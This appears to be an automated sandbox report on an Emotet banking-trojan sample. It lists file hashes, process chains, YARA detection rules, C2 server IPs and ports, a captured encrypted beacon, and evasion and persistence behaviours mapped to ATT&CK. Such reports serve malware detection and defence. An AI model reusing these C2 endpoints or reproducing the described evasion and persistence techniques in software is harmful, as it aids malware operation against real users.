Play interactive tour

Edit tour

Analysis Report zeD11Fztx8

Overview

General Information

Sample Name:	zeD11Fztx8 (renamed file extension from none to exe)
Analysis ID:	384980
MD5:	ecbc4b40dcfec4ed1b2647b217da0441
SHA1:	e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:	878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected Emotet

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for sample

Contains capabilities to detect virtual machines

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Startup

System is w10x64

zeD11Fztx8.exe (PID: 6720 cmdline: 'C:\Users\user\Desktop\zeD11Fztx8.exe' MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

zeD11Fztx8.exe (PID: 6728 cmdline: C:\Users\user\Desktop\zeD11Fztx8.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

storageservice.exe (PID: 6812 cmdline: C:\Windows\SysWOW64\storageservice.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

storageservice.exe (PID: 6828 cmdline: C:\Windows\SysWOW64\storageservice.exe MD5: ECBC4B40DCFEC4ED1B2647B217DA0441)

svchost.exe (PID: 4800 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5688 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6352 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
zeD11Fztx8.exe	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
zeD11Fztx8.exe	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 40 00 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 40 00 85 C0

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.640361081.0000000001381000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000000.638984509.0000000001381000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000000.633157257.0000000001381000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000000.639793428.0000000001381000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.898946523.0000000001381000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000000.632271273.0000000001381000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000002.00000002.640209506.0000000001381000.00000020.00020000.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.storageservice.exe.1380000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.storageservice.exe.1380000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 38 01 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 38 01 85 C0
1.2.zeD11Fztx8.exe.1380000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.zeD11Fztx8.exe.1380000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 38 01 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 38 01 85 C0
3.0.storageservice.exe.1380000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.0.storageservice.exe.1380000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 38 01 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 38 01 85 C0
2.2.storageservice.exe.1380000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.2.storageservice.exe.1380000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 38 01 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 38 01 85 C0
0.0.zeD11Fztx8.exe.1380000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.0.zeD11Fztx8.exe.1380000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 38 01 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 38 01 85 C0
1.0.zeD11Fztx8.exe.1380000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.0.zeD11Fztx8.exe.1380000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 38 01 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 38 01 85 C0
2.0.storageservice.exe.1380000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
2.0.storageservice.exe.1380000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 38 01 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 38 01 85 C0
0.2.zeD11Fztx8.exe.1380000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0.2.zeD11Fztx8.exe.1380000.0.unpack	Emotet	Emotet Payload	kevoreilly	0x16f0:$snippet1: FF 15 F8 C1 38 01 83 C4 0C 68 40 00 00 F0 6A 18 0x1732:$snippet2: 6A 13 68 01 00 01 00 FF 15 C4 C0 38 01 85 C0
Click to see the 11 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: zeD11Fztx8.exe

Avira: detected

Multi AV Scanner detection for domain / URL

Show sources

Source: http://173.230.145.224:8080/

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: zeD11Fztx8.exe	Virustotal: Detection: 82%			Perma Link
Source: zeD11Fztx8.exe	ReversingLabs: Detection: 96%

Machine Learning detection for sample

Show sources

Source: zeD11Fztx8.exe

Joe Sandbox ML: detected

Source: zeD11Fztx8.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: zeD11Fztx8.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: global traffic	TCP traffic: 192.168.2.4:49746 -> 193.169.54.12:8080
Source: global traffic	TCP traffic: 192.168.2.4:49757 -> 173.230.145.224:8080
Source: global traffic	TCP traffic: 192.168.2.4:49763 -> 80.86.91.232:7080

Source: Joe Sandbox View	IP Address: 193.169.54.12 193.169.54.12
Source: Joe Sandbox View	IP Address: 193.169.54.12 193.169.54.12
Source: Joe Sandbox View	IP Address: 80.86.91.232 80.86.91.232

Source: global traffic

HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 79.172.249.82:443Content-Length: 468Connection: Keep-AliveCache-Control: no-cacheData Raw: 77 ee 51 67 a8 c2 dc 38 20 bc 12 53 17 05 a1 e7 44 fa 23 2e b7 b8 71 13 ca 5f 34 cb 7d 0c be 09 5f d9 5a 5d 85 11 56 95 de d3 de 12 62 eb a8 08 e0 25 70 14 f1 93 c1 00 4a d5 23 a5 0e 77 2e d9 75 a6 89 1b 16 5a c1 dd 31 ce 32 df 13 a0 62 81 87 92 a5 75 31 ed 00 f4 09 08 7f ae 0e 3e f8 65 d0 b5 42 c2 d2 95 50 fe 33 48 54 55 da 3f 44 b3 df eb cb 47 92 31 e0 5c 2c 4d 46 89 f3 f7 e8 28 63 c8 8b 2d 43 6c f6 74 39 33 7f 21 86 82 16 e9 af 01 09 96 57 45 d8 63 20 47 a2 c1 62 3c 2d 74 bb 9d 73 46 51 ff 00 e2 16 99 bd 8a 96 75 c0 cc 9b 6b c8 76 2f 7d 1f 55 df 13 a3 4e 79 3d 0a 7d c1 09 f3 25 b0 1a 81 32 06 db 60 eb aa f9 77 7f 4f d5 65 00 d6 0f 40 ae d6 80 7d 6d d3 ee 85 09 f6 22 03 2f 33 e5 8b 34 8b db c6 73 67 06 01 9b 17 0a 4e 5b 3c f2 f3 aa 73 a9 cd 5f 3c 34 db da c3 54 41 f5 ea 56 26 df 67 5a 61 72 63 60 16 79 a7 db e1 af f6 2f 66 31 e2 88 4f 2d b7 94 7e cd ce 96 27 93 d4 79 59 88 98 23 46 23 99 b4 91 75 8e c1 dc 3b dd db f3 c3 0e 36 95 96 a2 94 42 6d b3 f7 b1 24 01 e7 71 a7 5e 9b 36 26 b2 96 3c 92 d8 90 7f db 79 c4 c3 fa 4e 68 ad ba 03 e9 19 9e d0 8a 2c 33 fb bd b2 75 f0 06 1f 2a 3f 5d 5b 6a 5d b5 14 d0 23 dd 58 78 93 f6 34 14 5e 10 ba 25 6e 54 d1 9d e9 4b b7 80 6f 7e 87 f1 04 26 22 80 65 b6 e1 bb f9 5c a2 ed 76 32 ff 84 0b d3 07 45 59 19 31 0c fe 79 50 52 83 bd d4 f3 e6 d7 cc e7 56 eb b7 23 59 81 8c 16 9c 72 74 e3 4a 61 67 88 c4 db bf 46 0d 23 37 4c 63 74 58 1e 57 77 32 e6 ef 17 cd 09 Data Ascii: wQg8 SD#.q_4}_Z]Vb%pJ#w.uZ12bu1>eBP3HTU?DG1\,MF(c-Clt93!WEc Gb<-tsFQukv/}UNy=}%2`wOe@}m"/34sgN[<s_<4TAV&gZarc`y/f1O-~'yY#F#u;6Bm$q^6&<yNh,3u*?][j]#Xx4^%nTKo~&"e\v2EY1yPRV#YrtJagF#7LctXWw2

Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 79.172.249.82
Source: unknown	TCP traffic detected without corresponding DNS query: 193.169.54.12
Source: unknown	TCP traffic detected without corresponding DNS query: 193.169.54.12
Source: unknown	TCP traffic detected without corresponding DNS query: 193.169.54.12
Source: unknown	TCP traffic detected without corresponding DNS query: 173.230.145.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.230.145.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.230.145.224
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.232
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.232

Source: unknown

Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	String found in binary or memory: http://173.230.145.224:8080/
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	String found in binary or memory: http://173.230.145.224:8080/gP
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	String found in binary or memory: http://173.230.145.224:8080/m
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	String found in binary or memory: http://193.169.54.12:8080/
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	String found in binary or memory: http://193.169.54.12:8080//
Source: storageservice.exe, 00000003.00000002.898800934.0000000001048000.00000004.00000020.sdmp	String found in binary or memory: http://79.172.249.82:443/
Source: storageservice.exe, 00000003.00000002.898800934.0000000001048000.00000004.00000020.sdmp	String found in binary or memory: http://79.172.249.82:443/$
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	String found in binary or memory: http://80.86.91.232:7080/
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	String found in binary or memory: http://80.86.91.232:7080/24
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	String found in binary or memory: http://80.86.91.232:7080/7
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	String found in binary or memory: http://80.86.91.232:7080/9.54.12:8080/;
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	String found in binary or memory: http://80.86.91.232:7080/G
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	String found in binary or memory: http://80.86.91.232:7080/ed
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	String found in binary or memory: http://80.86.91.232:7080/h

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: zeD11Fztx8.exe, 00000000.00000002.633588654.0000000000C8A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: zeD11Fztx8.exe, type: SAMPLE
Source: Yara match	File source: 00000001.00000002.640361081.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.638984509.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.633157257.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.639793428.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.898946523.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.632271273.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.640209506.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: zeD11Fztx8.exe, type: SAMPLE	Matched rule: Emotet Payload Author: kevoreilly
Source: 3.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 1.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 3.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 2.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 0.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 1.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 2.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 0.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly

Source: C:\Windows\SysWOW64\storageservice.exe

File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache

Jump to behavior

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

File deleted: C:\Windows\SysWOW64\storageservice.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\zeD11Fztx8.exe	Code function: 0_2_01386E70		0_2_01386E70
Source: C:\Users\user\Desktop\zeD11Fztx8.exe	Code function: 0_2_013877F0		0_2_013877F0

Source: zeD11Fztx8.exe, 00000001.00000002.641022607.0000000003780000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs zeD11Fztx8.exe
Source: zeD11Fztx8.exe, 00000001.00000002.641157550.0000000003870000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs zeD11Fztx8.exe
Source: zeD11Fztx8.exe, 00000001.00000002.641157550.0000000003870000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs zeD11Fztx8.exe

Source: zeD11Fztx8.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: zeD11Fztx8.exe, type: SAMPLE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 3.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 1.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 3.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 2.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 1.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 2.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload

Source: classification engine

Classification label: mal96.troj.evad.winEXE@9/0@0/4

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

Code function: 0_2_01382110 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_01382110

Source: C:\Users\user\Desktop\zeD11Fztx8.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\I7AD90449
Source: C:\Windows\SysWOW64\storageservice.exe	Mutant created: \BaseNamedObjects\Global\I7AD90449
Source: C:\Windows\SysWOW64\storageservice.exe	Mutant created: \BaseNamedObjects\M7B1EF2AC
Source: C:\Users\user\Desktop\zeD11Fztx8.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\M7AD90449
Source: C:\Users\user\Desktop\zeD11Fztx8.exe	Mutant created: \Sessions\1\BaseNamedObjects\MAA169F89

Source: zeD11Fztx8.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: zeD11Fztx8.exe	Virustotal: Detection: 82%
Source: zeD11Fztx8.exe	ReversingLabs: Detection: 96%

Source: unknown	Process created: C:\Users\user\Desktop\zeD11Fztx8.exe 'C:\Users\user\Desktop\zeD11Fztx8.exe'
Source: C:\Users\user\Desktop\zeD11Fztx8.exe	Process created: C:\Users\user\Desktop\zeD11Fztx8.exe C:\Users\user\Desktop\zeD11Fztx8.exe
Source: unknown	Process created: C:\Windows\SysWOW64\storageservice.exe C:\Windows\SysWOW64\storageservice.exe
Source: C:\Windows\SysWOW64\storageservice.exe	Process created: C:\Windows\SysWOW64\storageservice.exe C:\Windows\SysWOW64\storageservice.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\zeD11Fztx8.exe	Process created: C:\Users\user\Desktop\zeD11Fztx8.exe C:\Users\user\Desktop\zeD11Fztx8.exe	Jump to behavior
Source: C:\Windows\SysWOW64\storageservice.exe	Process created: C:\Windows\SysWOW64\storageservice.exe C:\Windows\SysWOW64\storageservice.exe	Jump to behavior

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: zeD11Fztx8.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

Code function: 0_2_01381F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

0_2_01381F40

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\SysWOW64\storageservice.exe

Executable created and started: C:\Windows\SysWOW64\storageservice.exe

Jump to behavior

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

PE file moved: C:\Windows\SysWOW64\storageservice.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

File opened: C:\Windows\SysWOW64\storageservice.exe:Zone.Identifier read attributes | delete

Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)

Show sources

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-14797

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

API coverage: 6.5 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 0000000D.00000002.841710504.000001EEB86B0000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.880141754.000002BBEBD40000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: storageservice.exe, 00000003.00000003.827346434.0000000001096000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000D.00000002.841710504.000001EEB86B0000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.880141754.000002BBEBD40000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 0000000D.00000002.841710504.000001EEB86B0000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.880141754.000002BBEBD40000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW(N
Source: svchost.exe, 0000000D.00000002.841710504.000001EEB86B0000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.880141754.000002BBEBD40000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\storageservice.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

Code function: 0_2_01381F40 VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,

0_2_01381F40

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

Code function: 0_2_01381BE0 mov eax, dword ptr fs:[00000030h]

0_2_01381BE0

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

Code function: 0_2_013815B0 GetModuleFileNameW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,CreateEventW,CreateMutexW,CloseHandle,GetLastError,SetEvent,CloseHandle,CloseHandle,memset,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,

0_2_013815B0

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\zeD11Fztx8.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\storageservice.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\zeD11Fztx8.exe

Code function: 0_2_01388D50 RtlGetVersion,GetNativeSystemInfo,

0_2_01388D50

Source: C:\Windows\SysWOW64\storageservice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: zeD11Fztx8.exe, type: SAMPLE
Source: Yara match	File source: 00000001.00000002.640361081.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.638984509.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.633157257.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.639793428.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.898946523.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.632271273.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.640209506.0000000001381000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.storageservice.exe.1380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zeD11Fztx8.exe.1380000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API11	Path Interception	Process Injection1	Masquerading12	Input Capture1	Security Software Discovery21	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
